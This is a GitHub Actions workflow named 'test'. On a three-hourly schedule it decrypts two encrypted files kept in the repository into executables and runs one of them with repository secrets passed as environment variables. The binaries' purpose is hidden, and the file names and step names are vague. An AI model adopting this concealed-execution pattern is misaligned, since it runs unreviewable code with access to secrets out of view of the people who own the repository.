name: test

on:
  workflow_dispatch:  
  schedule:
    - cron: '15 16-23/3 * * *'
    - cron: '15 0-13/3 * * *'

jobs:
  run_script:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: pre
        run: |
          echo "${{ secrets.LP_KEY }}" > logsin.txt
            python -c "from cryptography.fernet import Fernet; import base64; from hashlib import sha256; logsin = open('logsin.txt').read().strip(); key = base64.urlsafe_b64encode(sha256(logsin.encode()).digest()); open('logsin', 'wb').write(Fernet(key).decrypt(open('.github/workflows/logsin.lp', 'rb').read()))"
            python -c "from cryptography.fernet import Fernet; import base64; from hashlib import sha256; logsin = open('logsin.txt').read().strip(); key = base64.urlsafe_b64encode(sha256(logsin.encode()).digest()); open('logsin.v', 'wb').write(Fernet(key).decrypt(open('.github/workflows/logsin.v.lp', 'rb').read()))"


      - name: transport
        run: |
          chmod +x logsin
          chmod +x logsin.v
          ls -lah
          loga="${{ secrets.LOGA }}" logb="${{ secrets.LOGB }}" ./logsin
